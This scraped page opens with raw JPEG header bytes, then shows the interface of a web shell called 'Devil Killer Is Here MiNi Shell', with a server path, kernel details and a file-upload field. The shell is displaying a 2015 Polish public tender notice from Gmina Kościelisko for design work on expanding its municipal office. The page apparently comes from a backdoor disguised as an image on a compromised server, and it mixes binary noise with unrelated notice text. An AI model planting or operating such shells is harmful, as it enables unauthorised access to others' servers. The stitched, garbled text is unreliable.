JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150205/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150205/26430-N-2015.html

<p class="kh_header"><b>Kościelisko: Opracowanie dokumentacji projektowej dla przebudowy i  rozbudowy  istnieją-cego budynku na potrzeby Urzędu Gminy Kościelisko wraz z uzyskaniem pozwo-lenia na realizację inwestycji i pełnieniem nadzoru autorskiego.</b><br>
<b>Numer ogłoszenia: 26430 - 2015; data zamieszczenia: 05.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kościelisko , ul. Strzelców Podhalańskich 44, 34-511 Kościelisko, woj. małopolskie, tel. 018 2079100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koscielisko.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej dla przebudowy i  rozbudowy  istnieją-cego budynku na potrzeby Urzędu Gminy Kościelisko wraz z uzyskaniem pozwo-lenia na realizację inwestycji i pełnieniem nadzoru autorskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie pełnej dokumentacji projektowo-kosztorysowej przebudowy i rozbudowy ist-niejącego budynku na potrzeby Urzędu Gminy Kościelisko wraz z uzyskaniem pozwolenia na realizację inwestycji i peł-nieniem nadzoru autorskiego. Celem opracowania dokumentacji projektowej jest uzyskanie pozwolenia na budowę, przygotowanie zadania do realizacji, zapewnienie dokumentacji umożliwiającej wybór wykonawcy robót budowlanych w postępowaniu zgodnym z Prawem Zamówień Publicznych,Zakres zamówienia obejmuje:1)	Opracowanie mapy do celów projektowych2)	Opracowanie projektu budowlanego i projektu wykonawczego wraz z inwentaryzacją i kosztorysami na bazie kon-cepcji: ,Rozbudowa Urzędu Gminy Kościelisko- stanowiącej załącznik nr 1 do SIWZ
Konstrukcja :- inwentaryzacja do celów projektowych
- ekspertyza techniczna istniejącego budynku
- projekt Budowlany obejmujący przebudowę i nadbudowę
- projekt Wykonawczy obejmujący przebudowę i nadbudowę istniejącego budynku

Instalacje elektryczne:
- inwentaryzacja branżowa
- bilans mocy obiektu
- instalacja oświetlenia awaryjnego 
- instalacja oświetlenia ewakuacyjnego i kierunkowego
- instalacja gniazd wtykowych
- instalacja gniazd dedykowanych  (komputerowych)
- instalacja siły
- instalacja odnawialnych źródeł energii fotowoltaiki  na dachu budynku 
- instalacja nagłośnienia w sali posiedzeń
- instalacja sieci strukturalnych
- instalacja sygnalizacji pożaru SAP
- instalacja monitoringu całego systemu terenu CCTV
- instalacja kontroli dostępu
- instalacja oddymiania
- instalacja połączeń wyrównawczych
- instalacja ochrony przepięciowej
Instalacje sanitarne:
- inwentaryzacja do celów projektowych
- kotłownia na paliwo stałe- pellet
- instalacja centralnego ogrzewania
- instalacja wody ciepłej, zimnej, przeciwpożarowej
- instalacja kanalizacji sanitarnej

Architektura

Technologie odnawialnych źródeł energii:
- kotłownia na biomasę
- kolektory słoneczne
- panele fotowoltaiczne

3)	Opracowanie Karty Informacyjnej Zadania w liczbie od 1 do 3 w zależności od uzgodnienia z WFOŚiGW w Krakowie
4)	Opracowanie Wniosku Aplikacyjnego w liczbie od 1 do 3 w zależności od uzgodnienia z WFOŚiGW w Krakowie oraz wyliczenie efektu ekologicznego osobno dla każdej technologii OZE (kotłownia biomasowa, kolektory słoneczne, pa-nele fotowoltaiczne)
5)	Wykonawca jest zobowiązany do uzyskanie w imieniu Inwestora wszelkich niezbędnych uzgodnień z instytucjami opiniodawczymi - opinii, zapewnień i zezwoleń wymaganych do otrzymania decyzji pozwolenia na budowę
6)	Wykonawca jest zobowiązany do przygotowania stosownych wniosków i uzyskanie koniecznych opinii niezbędnych do uzyskania prawomocnego pozwolenia na budowę. 
7)	Wykonawca jest zobowiązany do przygotowania i złożenia kompletnego wniosku o pozwolenie na budowę oraz uzy-skanie decyzji pozwolenia na budowę
8)	Wykonawca jest zobowiązany do wykonania specyfikacji technicznych wykonania i odbioru robót 
9)	Wykonawca jest zobowiązany do wykonania dokumentacji kosztorysowej (kosztorys inwestorski oraz przedmiar ro-bót). 
10)	Wykonawca jest zobowiązany do wykonanie kompletnej dokumentacji projektowej z punktu widzenie celu, któremu ma służyć, sporządzonej w oparciu i na postawie obowiązujących przepisów prawnych, w tym przepisów prawa miej-scowego, a w szczególności zgodnie z: 
1.	rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego (Dz. U. Nr 202, poz. 2072, z późn. zm.); 
2.	rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy pro-jektu budowlanego (Dz. U. Nr 120 poz. 1133, z późn. zm.); 
3.	rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw spo-rządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowa-nych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130 poz. 1389); 
4.	rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, ja-kimi powinny odpowiadać budynki i ich usytuowanie (Dz. U. Nr 75, poz. 690, z późn. zm.); 
5.	przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn.: Dz. U. z 2006 r. Nr 156, poz. 1118, z późn. zm.); 
6.	rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 7 czerwca 2010 r. w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów( Dz. U. Nr 109, poz. 719) 
7.	innymi przepisami obowiązującymi przy sporządzaniu ww. dokumentacji.
Wykonanie projektu wykonawczego, który powinien uzupełniać i uszczegóławiać projekt budowlany w zakre-sie i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego, przygo-towania oferty przez wykonawcę i realizacji robót budowlanych. Projekty wykonawcze muszą być opracowane na podstawie zatwierdzonego projektu budowlanego. Projekty wykonawcze muszą zawierać rysunki w skali uwzględniającej specyfikę zamawianych robót i zastosowanych skal rysunków w projekcie budowlanym wraz z wyjaśnieniami opisowymi 
11)   Wykonawca jest zobowiązany do wykonania dokumentacji w ilości: 
-	Projekt budowlany (w wersji wydruku papierowego), który zapewni prawidłową realizację robót i ich przeka-zanie do użytkowania wraz ze wszystkimi wymaganymi uzgodnieniami, opiniami i operatami umożliwiają-cymi uzyskanie pozwolenia na budowę - w ilości niezbędnej do uzyskania pozwolenia na budowę. 
-	Kolorowa kopia zatwierdzonego projektu budowlanego - opieczętowanego przez Starostwo Powiatowe w Za-kopanem - 3 egz. w wersji papierowej; 1 egz. w wersji elektronicznej (skan). 
-	Projekt wykonawczy - 3 egz. w wersji papierowej; 1 egz. w wersji elektronicznej (skan ) 
-	Specyfikacje techniczne wykonania i odbioru robót w wersji papierowej - 3 egz. w wersji papierowej; 1 egz. w wersji elektronicznej. 
-	Dokumentacja kosztorysowa: przedmiar robót, kosztorys inwestorski w wersji papierowej - 1 egzemplarz, oraz 1 egz. w wersji elektronicznej 
-	Oświadczenie o kompletności dokumentacji oraz zgodności z umową, obowiązującymi przepisami i normami - 1 egzemplarz 
-	wizualizacja  1 egz. w wersji papierowej; 1 egz. w wersji elektronicznej
Zakres zamówienia obejmuje również: 
-	opracowywanie wyczerpujących odpowiedzi na złożone pytania, ewentualna korekta kosztorysów i dokumen-tacji będąca następstwem zapytań natury technicznej składanych w trakcie prowadzenia postępowania prze-targowego na roboty budowlane; 
-	aktualizację kosztorysów inwestorskich w okresie 3 lat od dnia uzyskania ostatecznej decyzji pozwolenia na budowę; 
-	pełnienie nadzoru autorskiego w trakcie realizacji inwestycji aż do zakończenia okresu rękojmi i gwarancji za wady robót budowlanych. 

Zamawiający umożliwia Wykonawcom (po wcześniejszym telefonicznym uzgodnieniu terminu) dokonanie wizji lo-kalnej w terenie w celu zdobycia wszelkich informacji, które mogą być konieczne do prawidłowej wyceny wartości zamówienia, gdyż wyklucza się możliwość roszczeń wykonawcy związanych z błędnym skalkulowaniem ceny lub pominięciem elementów niezbędnych do wykonania umowy. W przypadku stwierdzenia przez wykonawców pod-czas wizji lokalnej konieczności wykonania ewentualnych dodatkowych opracowań niezbędnych do prawidłowego wykonania przedmiotu zamówienia i mających wpływ na cenę oferty Wykonawca zobowiązany jest do pisemnego złożenia zapytania, w trybie art. 38 ust. 1 ustawy Prawo zamówień publicznych. Roszczenia zgłoszone po wyborze najkorzystniejszej oferty nie będą uwzględniane, ponieważ zamawiający nie będzie ponosił żadnych dodatkowych kosztów za prawidłowe wykonanie przedmiotu zamówienia. 

Wszelkie koszty poniesione w związku z czynnościami niezbędnymi dla prawidłowego wykonania dokumentacji po-nosi wykonawca i powinny być uwzględnione w cenie oferty.

	CPV 71220000-6 Usługi projektowania architektonicznego
	          71320000 - Usługi inżynieryjne w zakresie projektowania.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem zamówień uzupełniających mogą być usługi z zakresu opracowania dokumentacji projektowej przebudowy, rozbudowy budynku na potrzeby UG Kościelisko</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.22.00.00-6, 71.32.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do przetargu Wykonawcy zobowiązani są wnieść wadium w wysokości: 2 500,00 zł (słownie: dwa tysiące pięćset złotych 00/100).
2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
-	pieniądzu,
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
-	gwarancjach bankowych,
-	gwarancjach ubezpieczeniowych,
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42, poz. 275, z późniejszymi zmianami).
3.	Wadium wnoszone w pieniądzu wpłaca się przelewem z rachunku bankowego Wykonawcy na rachunek bankowy Zamawiającego: PBS o-Zakopane numer rachunku 03 8821-0009-0000-0000-1443-0006 (z dopiskiem wadium przetar-gowe   ZP.271-10/2015).
4.	Wadium należy wnieść przed upływem terminu składania ofert tj. do dnia 17 lutego 2015 roku do godz. 10.00. (Decy-duje data uznania wpłaty na rachunku Zamawiającego).
5.	Wadium musi obejmować okres związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań
Wykonawca spełni ww. warunek, jeżeli złoży oświadczenie o spełnianiu warunków zgodnie z art. 22 ust. 1 ustawy prawo za-mówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia Wykonawca  spełni ww. jeżeli wykaże - złoży wykaz  wykonanych,  a w przypadku  świadczeń okresowych lub ciągłych  			również wykonywanych, głównych usług w okresie  trzech lat przed upływem terminu składania ofert, a jeżeli okres 		 	 prowadzenia działalności jest krótszy - w tym okresie, co najmniej: dwie usługi o wartości co najmniej 80 000,00 zł brutto 		każda  polegające na wykonaniu dokumentacji projektowej wraz z  uzyskaniem pozwolenia na budowę dla inwestycji 			polegającej na budowie lub przebudowie lub rozbudowie  obiektu użyteczności publicznej o kubaturze co najmniej 			4500m3 każdy z zastosowaniem  technologii odnawialnych źródeł energii: kotłowni na biomasę i  kolektorów słonecznych i 			paneli fotowoltaicznych dla każdego wykazanego obiektu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań
Wykonawca spełni ww. warunek, jeżeli złoży oświadczenie o spełnianiu warunków zgodnie z art. 22 ust. 1 ustawy prawo za-mówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia Wykonawca spełni ww. warunek 		jeżeli  wykaże (przedłoży wykaz osób) iż dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia, w 		szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, do	-		świadczenia i  wykształcenia 	niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynno		ści, oraz informacją o podstawie do dysponowania tymi osobami- zespół projektowy składający się  co najmniej z:
-	Projektanta, pełniącego rolę  głównego projektanta i koordynatora projektu  posiadającego uprawnienia projek-towe w specjalności architektonicznej bez ograniczeń lub odpowiadające im ważne uprawnienia budowla-ne, które zostały wydane na podstawie wcześniej obowiązujących przepisów, lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie przepisów w kraju, w którym zostały wydane
-	Projektanta posiadającego uprawnienia projektowe w specjalności konstrukcyjno-budowlanej bez ograni-czeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obo-wiązujących przepisów, lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie przepisów w kraju, w którym zostały wydane
-	Projektanta posiadającego uprawnienia projektowe  w specjalności instalacyjnej w zakresie sieci, instala-cji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograni-czeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcze-śniej obowiązujących przepisów, lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie przepisów w kraju, w którym zostały wydane 
-	Projektanta posiadającego uprawnienia projektowe  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych bez ograniczeń które zostały wydane na podstawie wcześniej obowiązują-cych przepisów, lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie przepisów w kra-ju, w którym zostały wydane
-	Projektanta posiadającego uprawnienia projektowe  w specjalności instalacyjnej w  zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budow-lane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie przepisów w kraju, w którym zostały wydane
-	Projektanta posiadającego uprawnienia projektowe w specjalności inżynieryjnej drogowej bez ograniczeń lub w ograniczonym zakresie lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, lub odpowiadające im ważne uprawnienia budowlane wy-dane na podstawie przepisów w kraju, w którym zostały wydane
-	Osoby mającej doświadczenie - biorącej udział  w co najmniej dwóch przedsięwzięciach - polegających opraco-waniu wniosku aplikacyjnego wraz z załącznikami, (które przeszły pozytywnie ocenę formalną) o dofi-nansowanie zadania ze środków zewnętrznych (krajowych lub europejskich)  w zakresie odnawialnych źródeł energii


		Uwaga: ww. funkcje dla jednej osoby mogą być łączone.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań
Wykonawca spełni ww. warunek, jeżeli złoży oświadczenie o spełnianiu warunków zgodnie z art. 22 ust. 1 ustawy prawo za-mówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>ew. pełnomocnictwa, ew. potwierdzenie wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - termin realizacji zamówienia - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany umowy mogą być dokonywane na następujących zasadach:
1)	W przypadku zmiany danych teleadresowych, osób reprezentujących firmę, kluczowych specjalistów- na wniosek Zamawiającego lub Wykonawcy.
2)	W przypadku zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy.
3)	W przypadku przedłużenia procedur administracyjnych na etapie wydawania opinii, uzgodnień, postanowień i decyzji administra-cyjnych 
4)	W przypadku gdy zmiany treści umowy są korzystne dla Zamawiającego a Wykonawca nie wyrazi sprzeciwu co do wprowadzenia tych zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
